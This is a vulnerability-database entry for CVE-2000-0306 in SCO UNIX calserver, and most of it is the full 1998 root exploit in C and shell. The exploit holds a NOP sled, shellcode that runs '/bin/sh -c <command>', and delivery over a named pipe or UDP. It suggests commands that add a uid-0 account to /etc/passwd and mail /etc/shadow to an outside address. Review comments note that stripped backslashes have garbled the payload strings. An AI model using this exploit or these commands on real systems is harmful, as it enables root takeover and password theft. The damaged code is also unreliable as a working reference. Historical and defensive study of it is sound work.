SCO UNIX calserver远程缓冲区溢出漏洞
漏洞ID | 1105391 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 1998-12-29 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2000-0306 |
CNNVD-ID | CNNVD-200103-031 |
漏洞平台 | SCO | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
SCO UNIX 是一种商业 Unix 系统。SCO UNIX 的日历服务进程 calserver 在处理收到的消息时存在缓冲区溢出漏洞:攻击者既可以在本地通过 calserver 的命名管道,也可以在 calserver 以网络模式运行时远程(默认为 UDP 6373 端口)发送特制消息,从而在目标主机上以 root 权限执行任意命令。下面的攻击程序由 Leshka Zakharoff 于 1998 年 12 月公开,其注释中声明针对 SCO OpenServer Enterprise System 5.0.4,程序中的返回地址与各偏移量均为该版本硬编码;SCO 随后发布了安全公告 SB-99.02(见参考资料)。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/2353/info
Versions of SCO Unix calserver are vulnerable to a buffer overflow attack which can permit root access to a remote attacker.
*/
#include <stdio.h>
#include <fcntl.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
/*
 * NOTE(review): this is the 1998 Bugtraq exploit as reproduced by the
 * vulnerability database, and the reproduction is damaged: every backslash
 * has been stripped. The string literals below read "x00x00..." where the
 * original had "\x00\x00...", 'x90' where it had '\x90', "n" where it had
 * "\n", and the 75-space command placeholder inside codes[] (the bytes that
 * memcpy(codes+40, cmd, ...) overwrites) has been collapsed to two single
 * spaces. As printed it does not compile (see the printf calls at the
 * command prompt) and the byte layout that the offsets 40, 131 and 201 rely
 * on no longer holds. Keep it as historical documentation of CVE-2000-0306,
 * not as something to build.
 *
 * What the visible code does:
 *   argv[1]  target host name, or the literal "local" (prompted for if absent)
 *   argv[2]  UDP port in network mode (prompted for if absent; prompt default 6373)
 *   stdin    the shell command to run on the target; the prompt says <= 75 chars
 * It assembles msg[] = a 52-byte calserver message header, a 0x90 NOP sled up
 * to offset 600, and the shellcode appended at msg+600. A return address
 * (start_addr) is written at msg+201 (presumably where the overflowed return
 * address lands -- not verifiable from here) and into the movl $...,%esp
 * immediate at codes+131, so the payload re-points the stack into the sled
 * before it starts pushing. The shellcode builds argv = {"/bin/sh", "-c",
 * <command>, NULL} and enters the kernel through the lcall 7,0 gate with the
 * syscall number the author labels execv. The x01 / xff filler bytes are
 * turned into the required zero bytes at run time by the decb/incl
 * instructions at the top, so the payload itself contains no NUL and
 * strlen(codes) can measure it.
 *
 * Delivery: local mode writes the whole buffer to the calserver named pipe;
 * network mode sends it from msg+12 over a UDP socket, so the first 12 bytes
 * of the header appear to matter only on the pipe.
 *
 * Code-quality caveats for anyone reading this as C rather than history:
 * - gets() is used for all three prompts: unbounded reads into fixed arrays
 *   (gets was removed from the language in C11).
 * - the command is copied into codes[] with strlen(cmd) as the length; a
 *   command longer than the placeholder silently overwrites the rest of the
 *   shellcode. The "max length=75" in the prompt is advice, not a check.
 * - string.h, stdlib.h and unistd.h are not included, so strlen, memcpy,
 *   memset, strcpy, exit, write, close and atoi are implicitly declared.
 * - main() is K&R style with no return type and no return statement.
 */
main(argc, argv)
int argc;
char *argv[];
{
/* Named pipe calserver reads in its default local mode. */
#define calserver_pipe "/usr/lib/scosh/pipes/pdg18e5_0000"
/* Address the payload returns into / resets %esp to; expected to fall inside
 * the NOP sled on the target's stack. Hard-coded for one SCO build. */
#define start_addr 0x7ffffd80
#define hostnamelen 100
#define portnumberlen 10
#define cmdlen 80
char hostname[hostnamelen],portnumber[portnumberlen],cmd[cmdlen];
char *hn,*pn;
int s;
struct sockaddr_in sin;
struct hostent *hp, *gethostbyname();
/* 600 bytes of header+sled plus the shellcode; 850 leaves headroom. */
char msg[850];
/* 52-byte message header. Only three fields are non-zero: the leading
 * message-length word (filled in for local mode), a word of 0xff, and the
 * opcode 0x1c. The field names are the original author's. */
char *msghdr=
"x00x00x00x00" // message length
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"xffxffxffxff"
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00" // packet_sz
"x1cx00x00x00" // opcode
"x00x00x00x00"; // maxmsgsz
/* i386 shellcode. Layout, by offset from the start of codes[]:
 *     0  jmp cont            (forward jump over the data)
 *     2  geteip: pop %ebp    (%ebp = address of the byte after "call geteip")
 *     3  ..  patch the x01/xff fillers below into zero bytes, then ret
 *    29  "/bin/sh" x01       x01 -> NUL terminator
 *    37  "-c" x01
 *    40  75 spaces x01       <command> is memcpy'd here; x01 -> NUL
 *   116  execv: leal/lcall   syscall number, then lcall 7,0
 *   129  cont: movl $X,%esp  X is patched to start_addr at codes+131
 *   135  call geteip, then push NULL, <command>, "-c", "/bin/sh" as argv
 *        and the lcall arguments, then jmp execv.
 * The spaces at offset 40 have been collapsed in this copy (see top). */
char codes[]=
{
"xebx7f" //start : jmp cont
"x5d" //geteip: popl %ebp
"x55" // pushl %ebp
"xfex4dx98" // decb 0xffffff98(%ebp)
"xfex4dx9b" // decb 0xffffff9b(%ebp)
"xfex4dxe7" // decb 0xffffffe7(%ebp)
"xfex4dxeb" // decb 0xffffffeb(%ebp)
"xfex4dxec" // decb 0xffffffec(%ebp)
"xfex4dxed" // decb 0xffffffed(%ebp)
"xffx45xef" // incl 0xffffffef(%ebp)
"xfex4dxf4" // decb 0xfffffff4(%ebp)
"xc3" // ret
"/bin/sh" //
"x01" // 0xffffff98(%ebp)
"-c"
"x01" // 0xffffff9b(%ebp)
" "
" "
"x01" // 0xffffffe7(%ebp)
"x8dx05x3bx01x01x01" //execv : leal 0x3b,%eax
"x9axffxffxffxffx07x01" // lcall 0x7,0x0
"xc7xc4xffxffxffxff" //cont : movl $0xXXXX,%esp
"xe8x76xffxffxff" // call geteip
"x33xc0" // xorl %eax,%eax
"x50" // pushl %eax
"x81xc5x9cxffxffxff" // addl $0xffffff9c,%ebp
"x55" // pushl %ebp
"x81xc5xfdxffxffxff" // addl $0xfffffffd,%ebp
"x55" // pushl %ebp
"x81xc5xf8xffxffxff" // addl $0xfffffff8,%ebp
"x55" // pushl %ebp
"x55" // pushl %ebp
"x5b" // pop %ebx
"x8bxec" // movl %esp,%ebp
"x50" // pushl %eax
"x55" // pushl %ebp
"x53" // pushl %ebx
"x50" // pushl %eax
"xebxc6" // jmp execv
};
/* Host: argv[1], else prompt; empty answer means "local". */
if (argc<2)
{
printf("Host [local] : ");
gets(hostname);
if (!strlen(hostname)) strcpy(hostname,"local");
hn=hostname;
}
else
hn=argv[1];
/* Port: only asked for in network mode. Note the else branch also runs for
 * host "local" with argc<3, where argv[2] is NULL (argc==2) or past the end
 * of argv (argc==1); harmless only because pn is never used in local mode. */
if ((argc<3)&&strcmp("local",hn))
{
printf("Port [6373] : ");
gets(portnumber);
if (!strlen(portnumber)) strcpy(portnumber,"6373");
pn=portnumber;
}
else
pn=argv[2];
/* The examples offered are "add a uid-0 account" and "mail /etc/shadow".
 * These printf lines lost their escaped quotes and newlines in this copy. */
printf("Type a command (max length=75), for example :n");
printf(""echo r00t::0:0:Leshka Zakharoff:/:>>/etc/passwd"n");
printf(""mail [email protected]</etc/shadow"n");
printf(" <-----------------------------------75");
printf("------------------------------------>n>");
gets(cmd);
/* Drop the command over the space placeholder; no length check. */
memcpy(codes+40,cmd,strlen(cmd));
/* NOP sled, header on top of it, then patch the two address slots. */
memset(msg,'x90',600);
memcpy(msg,msghdr,52);
*(unsigned long*) (msg+201)= *(unsigned long*) (codes+131) = start_addr;
memcpy(msg+600,codes,strlen(codes));
if (!strcmp("local",hn))
{
/* Message-length word = everything after the first 4 bytes. */
* (unsigned long*) msg = (unsigned long) (600+strlen(codes)-4);
if ((s=open(calserver_pipe,O_WRONLY)) == -1)
{
printf("Error opening calserver pipen");
exit(1);
};
if (write(s,msg,600+strlen(codes)) == -1)
{
printf("Error writing to the calserver pipen");
exit(1);
};
exit(0);
};
/* Network mode: resolve the host and send one UDP datagram. The port comes
 * straight from atoi(pn); a non-numeric port becomes 0 without an error. */
hp = gethostbyname(hn);
if (hp == 0)
{
herror("gethostbyname");
exit(1);
}
memcpy(&sin.sin_addr,hp->h_addr,hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(atoi(pn));
if ((s = socket(AF_INET, SOCK_DGRAM, 0)) == -1)
{
perror("socket");
exit(1);
}
if (connect(s, (struct sockaddr *) &sin, sizeof(sin)) == -1)
{
perror("connect");
exit(1);
}
/* The first 12 header bytes are not sent on the wire. A short write is not
 * detected here: only -1 is treated as failure. */
if (write(s, msg+12,600-12+strlen(codes)) == -1)
{
perror("write");
exit(1);
}
close(s);
}
*** Shell version ***
#!/bin/sh
#
# ... The punishment for inobedience ...
#
# This is a local/remote buffer overflow exploit for calserver bug
# (SCO OpenServer Enterprise System v 5.0.4p).
# If you have any problems with it, drop me a letter.
# Happy New Year !
#
#
# *** Brief manual ***
#
# Local mode is a default mode for the calendar server. If calserver
# runs on your site in this mode just try to run the exploit with only
# argument "local". If calserver operates on your or other sites in the
# network mode you should use exploit with two arguments: "<sitename>" and
# "<portnumber>". Portnumber is usually equal to 6373 but other values are
# possible. Don't use "localhost" or "127.0.0.1" as a <sitename>. Check
# "/usr/lib/scosh/calargs" file to see the current mode of the calendar
# server.
# Execution of the exploit is similar to a blind execution of the
# following command with root permissions: "/bin/sh -c <command>".
# There are a few limitations for number and length of commands. The
# length of a command should not exceed 75 symbols. The number of
# executable commands depends on calserver configuration and it is equal to
# the number of child calendar servers which are basically 4 by default.
# Therefore running of this exploit must be very effective. You are free
# to use sequences of a shell commands separated by ";" as a <command>.
#
# 9.999,99
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1998. E-mail: [email protected]
#
#
#
# NOTE(review): this copy of the script is damaged. Every backslash has been
# stripped, so the payload strings below show " 220 220" where the original
# had "\220\220" (octal escapes for echo), and the backslash-newline
# continuations that joined the msghdr2/codes1/codes2 lines are gone. As
# printed, the assignments are syntactically broken and the bytes that reach
# the target are not the intended ones. It is the shell counterpart of the C
# program above: same header, NOP sled (octal 220 = 0x90), return address
# (the "200 375 377 177" run = 0x7ffffd80 little-endian) and shellcode,
# assembled in a temp file and delivered either to calserver's named pipe or
# over UDP with ttcp.
#
# Named pipe used by calserver in its default local mode.
calserver_pipe="/usr/lib/scosh/pipes/pdg18e5_0000"
# Scratch file for the assembled message. Fixed, predictable name in a
# world-writable directory: any local user can pre-create or symlink
# /tmp/msg between the rm -f below and the first redirection into it.
msg="/tmp/msg"
# Pipe-only leading header (message-length word area); not sent on the wire.
msghdr1=' 2 3 '
# Rest of the message header, then the 0x90 sled with the return address
# embedded, then the first half of the shellcode up to "-c".
msghdr2=' 377 377 377 377 '
' 34 '
codes1=' 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 200 375 377 177 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 353 177]U 376M 230 376M 233 376M 347 376M 353 376M 354 376M'
' 355 377E 357 376M 364 303/bin/sh 1-c 1'
# Second half of the shellcode: the terminator after the command slot, the
# syscall sequence, the movl $0x7ffffd80,%esp ("200 375 377 177"), and the
# argv-building pushes. The command itself goes between codes1 and codes2.
codes2=' 1 215 5; 1 1 1 232 377 377 377 377 7 1 307 304 200'
' 375 377 177 350v 377 377 3773 300P 201 305 234 377 377 377U'
' 201 305 375 377 377 377U 201 305 370 377 377 377UU[ 213 354'
'PUSP 353 306'
# Start from a clean scratch file (see the /tmp caveat above).
rm -f $msg
# Host: $1, else prompt; empty answer means local mode. The "_" prefix keeps
# test(1) happy when the value is empty or starts with "-".
if [ _$1 = "_" ]
then
{
echo -n "Host [local] :"
read hostname
if [ _$hostname = "_" ]
then
hostname="local"
fi
}
else
hostname=$1
fi
# Local mode needs the pipe to exist; network mode needs a port ($2 or prompt).
if [ _$hostname = "_local" ]
then
if [ -p $calserver_pipe ]
then
echo -n $msghdr1>$msg
else
echo "Error opening calserver pipe"
exit 1
fi
else
if [ _$2 = "_" ]
then
{
echo -n "Port [6373] :"
read portnumber
if [ _$portnumber = "_" ]
then
portnumber="6373"
fi
}
else
portnumber=$2
fi
fi
# Prompt for the command. The examples are "add a uid-0 account" and
# "mail /etc/shadow". The "n>" below was "\n>" before the backslash was lost.
echo "Type a command (max length=75), for example :"
echo '"echo r00t::0:0:Leshka Zakharoff:/:>>/etc/passwd"'
echo '"mail [email protected]</etc/shadow"'
echo -n " <-----------------------------------75"
echo -n "------------------------------------>n>"
read c
# Assemble: header + sled + first half, the command padded (left) to exactly
# 75 columns, then the second half. %75s pads but never truncates, so a
# command longer than 75 characters shifts and corrupts everything after it.
echo -n $msghdr2$codes1>>$msg
printf "%75s" "$c">>$msg
echo -n $codes2>>$msg
# Deliver: append to the named pipe, or send as a UDP datagram of 762 bytes
# via ttcp (-u UDP, -t transmit, -l buffer length) after a 4-byte trailer.
if [ _$hostname = "_local" ]
then
cat $msg>>$calserver_pipe
else
{
echo -n ' 377 377 377 377'>>$msg
cat $msg|/etc/ttcp -u -t -l762 -p$portnumber $hostname
}
fi
rm $msg
|参考资料
来源:BUGTRAQ
名称:19981229 Local/remote exploit for SCO UNIX.
链接:http://www.securityfocus.com/templates/archive.pike?list=1&date=1998-12-29&msg=[email protected]
来源:SCO
名称:SB-99.02
链接:ftp://ftp.sco.com/SSE/security_bulletins/SB-99.02a